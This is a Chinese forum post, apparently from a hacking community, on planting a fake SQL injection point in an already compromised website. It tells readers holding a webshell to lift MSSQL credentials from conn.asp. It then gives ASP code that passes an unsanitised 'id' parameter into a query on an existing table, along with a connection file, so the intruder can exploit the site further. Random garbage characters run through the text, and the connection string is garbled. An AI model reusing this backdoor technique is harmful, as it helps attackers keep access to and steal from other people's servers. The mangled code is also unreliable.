自己构造注入点方便入侵

admin

自己构造注入点方便入侵
' I1 D$ y; n1 r6 G0 D& }
- w7 B& z0 C7 u, d3 o9 |今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点，然后方便渗透，找到更多的可利用的信息

这两天一直考试，想了下，就先仍出来，有什么问题可以提出来，我们一起讨论！

首先你要拿了一个webshell，这样你找到连接数据库的文件，大多都是conn.asp这个文件里面有mssql的用户和
3 {5 Q7 f- ~5 Z" K6 Q- P
+ B2 |; w& T! y" u* J6 X! m密码，你要找到用户名、密码、数据库所在的IP，然后连接上去，至于连接大家应该都会，找到网站管理员的表
+ n5 Q/ a9 v* P6 I) Q
& Q5 Z9 S2 J' G1 Q8 |  ?' I因为我测试的时候是用管理员的表，我朋友说任何表名都可以，只要这个表存在，代码如下：
; I7 M& t% F0 a% \; f) Y
程序代码
<!--#include file="xx.asp"-->
) V6 n) E8 X% H- ^: L3 [% s$ ]<%
: [( p, Q7 A9 A0 |% Y+ b) z3 |set rs=server.createobject("ADODB.recordset")
, d9 U' _2 ?& Y/ m* R) Uid = request("id")
4 t3 [) Z# C  v# estrSQL = "select * from admin where id=" & id
5 _$ G' u+ c1 trs.open strSQL,conn,1,3
- N9 V2 j6 C: X! h1 H9 J" M3 Zrs.close
%>

( G3 h% }) f4 O' K4 M! l5 M3 ]把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名，注意必须存在
+ d2 Q$ {  O, ]
你可以连接上去看下表名就是了！这里假设的是admin是表名！这个文件名随便保存！

2 B4 a/ C5 }  d, m6 ?6 `然后就要构造一个连接数据库的文件了，代码如下：
/ p+ T8 Z( C& s6 S程序代码
<%        
% O5 l" M6 Z$ ]" ?7 k9 _" @2 G  n: TstrSQLServerName = "000.000.000.000"     '服务器名称或地址
strSQLDBUserName = "sqlname"         '数据库帐号
, {' j) N3 V. {7 TstrSQLDBPassword = "sqlpass"         '数据库密码
strSQLDBName = "sqldataname"           '数据库名称
. c" f7 X) Z( O0 x+ bSet conn = Server.CreateObject("ADODB.Connection")
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
9 X- t. i) y' |2 V* Mconn.open strCon
%>

这里应该都会了，就不罗嗦了，不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话，

* W! Y0 Q" z# Q+ I就这样，正常情况下，就OK了，伪造成功……

( V6 g0 F: [9 O6 R           如果有什么问题可以提出来大家一起探讨解决。